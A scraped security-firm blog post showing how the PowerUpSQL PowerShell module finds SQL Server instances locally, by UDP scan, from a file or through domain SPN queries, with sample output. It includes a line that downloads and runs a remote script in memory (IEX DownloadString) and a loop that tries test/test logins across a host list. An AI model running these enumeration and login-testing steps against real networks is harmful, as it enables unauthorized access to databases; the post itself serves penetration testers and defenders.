                                                            Tokenvator Release 3
                                                        
                                                                                <img data-del="avatar" src='https://www.netspi.com/wp-content/uploads/Alexander-Leary-150x150.png' class='avatar pp-user-avatar avatar-96 photo ' height='96' width='96'/>

Back

Blindly Discover SQL Server Instances with PowerUpSQL

August 1, 2016 | Scott Sutherland

In this blog I’ll show how PowerUpSQL can be used to blindly discover SQL Server instances on a system, network, or domain. This is an essential first step if you’re planning to search for sensitive data on SQL Servers, or plan to use SQL Servers as a means to escalate privileges on the domain.

Importing PowerUpSQL

Before we get started, you’ll have to get the PowerUpSQL module imported. Below are some basic instructions. For more options visit the GitHub project here.

Download PowerUpSQL.https://github.com/NetSPI/PowerUpSQL
Import the Module
```
PS C:\> Import-Module PowerUpSQL.psd1
```

Alternatively, you can load it with the PowerShell command below.

PS C:\> IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")

Discover SQL Server Instances with PowerUpSQL

Below is an overview of the PowerUpSQL discovery functions that can be used for enumerating SQL Server instances from different attacker perspectives. Each of them support the PowerShell pipeline so that they can be used with other PowerUpSQL functions.

Get-SQLInstanceLocal

This command should be used if you’ve already compromised a system and would like a list of the local SQL Server instances. It uses the local registry entries to find them. Below are a few example commands.

# Get a list of local SQL Server instances
PS C:\>Get-SQLInstanceLocal    

ComputerName       : SQLServer1
Instance           : SQLServer1\SQLEXPRESS
ServiceDisplayName : SQL Server (SQLEXPRESS)
ServiceName        : MSSQL$SQLEXPRESS
ServicePath        : "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
ServiceAccount     : NT Service\MSSQL$SQLEXPRESS
State              : Running

For more instance information pipe the Get-SQLInstanceLocal into Get-SQLServerInfo:

# Get a list of server information for each local instance
PS C:\>Get-SQLInstanceLocal | Get-SQLServerInfo

ComputerName           : SQLServer1
Instance               : SQLServer1\SQLEXPRESS
DomainName             : NETSPI
ServiceName            : MSSQL$SQLEXPRESS
ServiceAccount         : NT Service\MSSQL$SQLEXPRESS
AuthenticationMode     : Windows and SQL Server Authentication
Clustered              : No
SQLServerVersionNumber : 12.0.4213.0
SQLServerMajorVersion  : 2014
SQLServerEdition       : Express Edition (64-bit)
SQLServerServicePack   : SP1
OSArchitecture         : X64
OsMachineType          : WinNT
OSVersionName          : Windows 8.1 Pro
OsVersionNumber        : 6.3
Currentlogin           : Domain\User
IsSysadmin             : Yes
ActiveSessions         : 1

Get-SQLInstanceScanUDP

If you’re starting from an unauthenticated local network position then this function can come in handy. It returns SQL Server instances on the network from a UDP scan. It accepts a piped list of computer names or IP addresses.

The example below shows how to run the UDP scan and display output to the console:

PS C:\>Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10 

ComputerName : SQLServer1
Instance     : SQLServer1\SQLEXPRESS
InstanceName : SQLEXPRESS
ServerIP     : 10.1.1.12
TCPPort      : 50213
BaseVersion  : 12.0.4100.1
IsClustered  : No

ComputerName : SQLServer1
Instance     : SQLServer1\Standard
InstanceName : Standard
ServerIP     : 10.1.1.12
TCPPort      : 50261
BaseVersion  : 12.0.4100.1
IsClustered  : No

ComputerName : SQLServer2
Instance     : SQLServer2\AppName
InstanceName : AppName
ServerIP     : 10.1.1.150
TCPPort      : 58979
BaseVersion  : 10.50.4000.0
IsClustered  : No

The example below shows how to run the UDP scan and save the list of enumerated SQL Servers to a file for later use:

PS C:\>Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10 | Select-Object Instance -ExpandProperty Instance | Out-File c:\temp\test.txt

Big thanks to Eric Gruber for his work on this function!

Get-SQLInstanceFile

Sometimes you’ll already have a list of SQL Servers to target. For example, you may have already discovered SQL Server instances and saved them to a file for later use. 😉 This function loads those instances from a file so they can be fed through the PowerShell pipeline into other PowerUpSQL functions. It accepts a file containing one SQL Server instance per line.

Below are examples of the three formats it accepts.

Servername
Servername\Instancename
Servername,port

Below is a basic command example:

PS C:\> Get-SQLInstanceFile -FilePath C:\temp\instances.txt

ComputerName   Instance                      
------------   --------                      
SQLServer1    SQLServer1\SQLEXPRESS     
SQLServer1    SQLServer1\STANDARDDEV2014
SQLServer2    SQLServer2,1433    
SQLServer2    SQLServer2

The example below shows how to load a list of SQL Server instances from a file and attempt to log into each of the with the user “test” and the password “test”.

PS C:\> Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
VERBOSE: SQLServer1\SQLEXPRESS : Connection Success.
VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success.
VERBOSE: SQLServer2,1433 : Connection Failed.
VERBOSE: SQLServer2 : Connection Success.

ComputerName   Instance                  Status    
------------   --------                  ------    
SQLServer1    SQLServer1\SQLEXPRESS      Accessible
SQLServer1    SQLServer1\STANDARDDEV2014 Accessible
SQLServer2    SQLServer2,1433            Not Accessible
SQLServer2    SQLServer2                 Accessible

Get-SQLInstanceDomain

This function is useful if you’re already a domain user and looking for SQL Server targets on the domain. It returns a list of SQL Server instances discovered by querying a domain controller for systems with registered MSSQL Service Principal Names (SPNs). By default, the function will use the domain and logon server for the current domain account. However, alternative domain credentials can be provided along with and an alternative domain controller.

To run as alternative domain user, use the runsas command below to launch PowerShell before importing PowerUpSQL.

runas /noprofile /netonly /user:domain\user PowerShell.exe

To simply list SQL Server instances registered on the current domain use the command below.

Get-SQLInstanceDomain –Verbose

To get a list of SQL Server instances that can be logged into with the current Windows user you can use the command below. In large environments, I think you’ll be surprised to see how many SQL Servers normal domain users can log into.

Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose –Threads 10 | Where-Object {$_.Status –eq ‘Accessible’}

Why do Domain User Accounts Have Unauthorized Access to so Many SQL Servers on the Domain?

It’s pretty common for people to doubt that members of the Active Directory group “Domain Users” would have any privileges on domain SQL Servers. However, in our experience it’s incredibly common in large environments for two reasons:

Developers and SQL Server administrators have a habit of explicitly providing login privileges to all members of the Active Directory group “Domain Users”. This seems to happen a lot, because domain groups aren’t created for managing access to associated databases.
When a SQL Server Express instance is installed on a domain system (and the TCP listener is enabled), a privilege inheritance chain exists that allows members of the Active Directory “Domain Users” group to log into the SQL Server instance with Public role privileges. This privilege chain is outlined in the blog “When Databases Attack: SQL Server Express Privilege Inheritance Issue“.

Due to the two common configurations described above, it’s often possible to gain a foot hold in SQL Server instances once any domain user is compromised. Naturally, this can lead to unauthorized data access, and provide the next step towards domain privilege escalation. Both topics will be covered in future blogs.

Wrap Up

In this blog I provided an overview of how SQL Server instances can be discovered with PowerUpSQL. I also provided some insight into why it’s common for standard domain users to have unauthorized access to some SQL Server instances on the domain. Hopefully the information will be useful to the red and blue teamers out there. Good luck and hack responsibly!

Scott Sutherland

Recent Posts

                                                        <img width="832" height="451" src="https://www.netspi.com/wp-content/uploads/122222_Republish-15-Ways-to-Bypass-the-PowerShell-Execution-Policy_Feature.jpg" alt="15 Ways to Bypass the PowerShell Execution Policy">												
                                                    
                                                            Technical BlogNetwork Penetration Testing                                                        
December 16, 2022

                                                            15 Ways to Bypass the PowerShell Execution Policy
                                                        
                                                                                <img data-del="avatar" src='https://www.netspi.com/wp-content/uploads/Scott_Sutherland-150x150.jpg' class='avatar pp-user-avatar avatar-96 photo ' height='96' width='96'/>                                                                                  
                                                                        
                                                        <img width="832" height="451" src="https://www.netspi.com/wp-content/uploads/080922_SMB-Shares-PowerHunt-Blog_Feature.jpg" alt="Attacking and Remediating Excessive Network Share Permissions in Active Directory Environments">												
                                                    
                                                            Adversary SimulationNetwork Penetration TestingTechnical Blog                                                        
August 9, 2022

                                                            Attacking and Remediating Excessive Network Share Permissions in Active Directory Environments
                                                        
                                                                                <img data-del="avatar" src='https://www.netspi.com/wp-content/uploads/Scott_Sutherland-150x150.jpg' class='avatar pp-user-avatar avatar-96 photo ' height='96' width='96'/>                                                                                  
                                                                        
                                                        <img width="832" height="451" src="https://www.netspi.com/wp-content/uploads/2021/07/072221_Tokenvator-Release-3_Feature.jpg" alt="Tokenvator Release 3">												
                                                    
                                                            Technical BlogNetwork Penetration Testing                                                        
July 22, 2021

                                                            Tokenvator Release 3
                                                        
                                                                                <img data-del="avatar" src='https://www.netspi.com/wp-content/uploads/Alexander-Leary-150x150.png' class='avatar pp-user-avatar avatar-96 photo ' height='96' width='96'/>

Name	Domain	Purpose	Expiry	Type
VISITOR_INFO1_LIVE	youtube.com	YouTube cookie.	6 months	HTTP
Test	test.com	Testing	7 days	HTTP

Featured

Get Windows Auto Login Passwords via SQL Server with PowerUpSQL

A brief history of xp_regread

Practical uses for xp_regread with the Public Role

Recovering Windows Auto Login Credentials with xp_regread

Wrap Up

References

Recent Posts

Establishing Registry Persistence via SQL Server with PowerUpSQL

An overview of xp_regwrite

PowerUpSQL primer

Using CurrentVersionRun to establish persistence with xp_regwrite

Setting a debugger for accessibility options using xp_regwrite

Wrap Up

References

Recent Posts

Finding Sensitive Data on Domain SQL Servers using PowerUpSQL

Finding Domain SQL Servers to Log Into

Finding Sensitive Data on Domain SQL Servers

Targeting Potentially Sensitive Databases

Bringing it All Together

Wrap Up

Recent Posts

Finding Weak Passwords for Domain SQL Servers on Scale using PowerUpSQL

Finding Domain SQL Servers to Log Into

Enumerating SQL Logins as a Domain User

Identifying Weak SQL Server Passwords on Scale using PowerUpSQL

Executing OS Commands on SQL Servers with PowerUpSQL

Wrap Up

Recent Posts

Blindly Discover SQL Server Instances with PowerUpSQL

Importing PowerUpSQL

Discover SQL Server Instances with PowerUpSQL

Get-SQLInstanceLocal

Get-SQLInstanceScanUDP

Get-SQLInstanceFile

Get-SQLInstanceDomain

Why do Domain User Accounts Have Unauthorized Access to so Many SQL Servers on the Domain?

Wrap Up

Recent Posts